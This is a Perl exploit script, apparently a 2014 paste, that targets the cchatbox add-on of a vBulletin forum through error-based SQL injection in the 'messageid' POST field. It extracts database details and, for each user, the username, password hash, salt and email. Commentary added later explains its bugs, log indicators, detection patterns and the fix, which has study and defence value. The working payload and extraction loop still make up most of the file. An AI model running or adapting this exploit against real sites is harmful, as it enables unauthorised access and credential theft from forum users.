
Untitled

a guest
Sep 22nd, 2014
  1. #!/usr/bin/perl
  2. use LWP::UserAgent;
  3. $ua = LWP::UserAgent->new;
  4. $ua->agent("MyApp/0.1 ");
      # $ua is a package global (no `my`; the script never enables strict or
      # warnings) and v_request() below uses it without it being passed in.
      # The agent string ends in a space; LWP::UserAgent documents that it then
      # appends its default "libwww-perl/<version>" token, so the User-Agent
      # recorded by the server should begin "MyApp/0.1 libwww-perl/" -- a
      # usable indicator when searching logs for runs of this script.
      #
      # Banner: names the targeted component (cchatbox) and the bug class (SQLI).
  5. print "##################################\n";
  6. print "############ EXPLOIT #############\n";
  7. print "##################################\n";
  8. print "## Portal: cchatbox ##\n";
  9. print "## Bug: SQLI ##\n";
  10. print "## Author: DSecurity ##\n";
  11. print "## Coder: vv0lll ##\n";
  12. print "##################################\n";
  13.  
      # The usage text is printed unconditionally; the script then exits unless
      # at least two arguments were given. The third argument (sleeptime) is
      # optional: v_request() falls back to 10 when $ARGV[2] is empty.
  14. print "Use: exploit.pl address number_user sleeptime\n";
  15. print "Example: exploit.pl http://localhost/vbb 10 10\n";
  16. if(@ARGV < 2) {exit;}
  17. print "\n\n================================================\n";
  18. #Foot print
      # Four requests, one each for the server version, data directory, current
      # database user and current database name. Only two arguments are passed,
      # so v_request() applies its defaults for table, WHERE and LIMIT offset.
  19. print v_request('MySQL version: ','@@version');
  20. print v_request('Data dir: ','@@datadir');
  21. print v_request('User: ','user()');
  22. print v_request('Database: ','database()');
  23.  
  24. #Get user
      # One pass per requested row of the `user` table. The fifth argument
      # ($i-1) becomes the LIMIT offset, so pass N asks for the userid of row N.
      # Each pass then issues five further requests keyed on that userid, i.e.
      # six POSTs per user, each followed by sleep($sleep) inside v_request().
      # In an access log this shows up as a slow, evenly spaced series of POSTs
      # to /cchatbox.php from one client.
  25. for($i=1;$i<=$ARGV[1];$i++){
  26. print "-----------------------------------------\n";
  27. print $id = v_request('ID: ','userid','user','1',$i-1);
      # v_request() always returns a string that starts with the label "ID: "
      # and `.*` may match nothing, so this test passes even when no value was
      # extracted. $2 is then empty or -- because v_request() never clears its
      # global $test -- the value left over from the previous call. Output of
      # this script should not be assumed to map one-to-one onto real rows.
  28. if($id =~ /(ID:)\s(.*)/){
  29. print v_request('Group: ','usergroupid','user','userid='.$2);
  30. print v_request('Username: ','username','user','userid='.$2);
  31. print v_request('Password: ','password','user','userid='.$2);
  32. print v_request('Salt: ','salt','user','userid='.$2);
  33. print v_request('Email: ','email','user','userid='.$2);
  34. }
  35.  
  36. }
  37.  
      # `$ARVG` is not `@ARGV`: this reads element 0 of an otherwise unused
      # array and prints an empty string. With warnings off, nothing is reported.
  38. print $ARVG[0];
  39. sub v_request{
      # Sends one POST to <$ARGV[0]>/cchatbox.php and returns "<label><value>\n".
      #
      # Arguments (positional, read from @_):
      #   $_[0]  label prefixed to the returned string
      #   $_[1]  expression placed after the inner SELECT
      #   $_[2]  table name; defaults to information_schema.tables
      #   $_[3]  WHERE condition; defaults to 1
      #   $_[4]  LIMIT offset; defaults to 0
      # The pause after each request comes from $ARGV[2] (default 10 seconds).
      #
      # Every variable below except $req and $res is a package global (no `my`),
      # so values persist from one call to the next.
  40. #Declare
  41. $print = $_[0];
  42. $select = $_[1];
  43. $from = $_[2];
  44. $where = $_[3];
  45. $limit = $_[4];
  46. $sleep = $ARGV[2];
      # Missing arguments arrive as undef, which compares equal to '' here
      # (silently, since warnings are not enabled), so the defaults apply.
  47. if ($from eq '') {$from = 'information_schema.tables';}
  48. if ($where eq '') {$where = '1';}
  49. if ($limit eq '') {$limit = '0';}
  50. if ($sleep eq '') {$sleep = '10';}
  51.  
  52. # Create a request
      # The body is declared as application/x-www-form-urlencoded but is not
      # actually URL-encoded: spaces, parentheses and commas are sent raw. The
      # `messageid` field, which a legitimate client would presumably fill with
      # a bare integer, instead carries " and (SELECT ... GROUP BY x)a)".
      # NOTE(review): for this to return data the server must be concatenating
      # messageid into a SQL statement and echoing the database error text to
      # the client. The corresponding fixes are to cast or bind messageid as an
      # integer (parameterized query) and to stop returning raw MySQL errors.
      # Detection: POSTs to /cchatbox.php with do=edit whose messageid is not
      # purely numeric, in particular ones containing "information_schema" or
      # "FLOOR(RAND(".
  53. my $req = HTTP::Request->new(POST => $ARGV[0].'/cchatbox.php');
  54. $req->content_type('application/x-www-form-urlencoded');
  55. $req->content('do=edit&messageid=0 and (SELECT 1 FROM(SELECT COUNT(*),CONCAT((select '.$select.' from '.$from.' WHERE '.$where.' limit '.$limit.',1),FLOOR(RAND(1)*3))x FROM information_schema.tables GROUP BY x)a)');
  56.  
  57. # Pass request to the user agent and get a response back
  58. my $res = $ua->request($req);
  59. #print $res->content;
      # The value is read back out of the response body: the pattern looks for
      # the literal text "MySQL Error", then a single-quoted string ending in 0,
      # and keeps what precedes that 0 as $3.
      # $test is assigned only on a match and is never cleared, so a response
      # without the expected error text makes this call return the value from
      # the previous call (or nothing on the first call).
  60. if($res->content =~ /(MySQL Error)(.*?)'(.*?)0'(.*)/)
  61. {$test = $3};
      # Pause after every request, whether or not a value was extracted.
  62. sleep($sleep);
  63. return $print.$test."\n";
  64. }
  65.  
  66.  
  67.  
  68. # E363C66E681CEC29 1337day.com [2014-09-23] 00934B86305D2D47 #